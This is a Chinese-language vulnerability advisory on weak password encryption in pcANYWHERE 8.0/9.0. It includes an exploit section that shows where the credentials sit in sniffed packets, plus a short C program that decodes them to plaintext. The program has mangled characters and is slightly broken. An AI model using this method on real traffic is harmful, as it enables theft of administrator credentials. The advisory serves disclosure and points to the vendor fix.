涉及程序:
pcANYWHERE8.0/9.0
描述
pcANYWHERE脆弱的加密技术允许轻易解出密码
详细
---- Discussion ----
pcANYWHERE 9.0缺省安全设置将用户名和密码设置了简单的加密,这样客户发送的密码将不是明文。由于通常大多数用户将加密方式设置为 "none" or "PcAnyWhere",所以可以很容易地先嗅探,然后解出密码。
该用户名和密码通常是系统管理员帐号。
下面是pcANYWHERE加密方式的简单描述和解密方法:
--- Exploit ---
The Username / password are contained in a string two
packets away from the "Enter your login name" and "Enter
your password" prompts. They are preceded by 0x06. The next
number is the string length.
here is the code of the exploit:
#include $#@60;stdio.h$#@62;
#include $#@60;string.h$#@62;
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the aaaaa password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]=\0;
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i$#@60;strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]=\0;
printf("password is %s \n",cleartext);
}
解决方案
http://service1.symantec.com/SUPPORT/pca.nsf/docid/199902231
2571812&src=w
附加信息
请参考:CNNS安全公告2000-02---PcAnywhere的漏洞 (APP,缺陷)
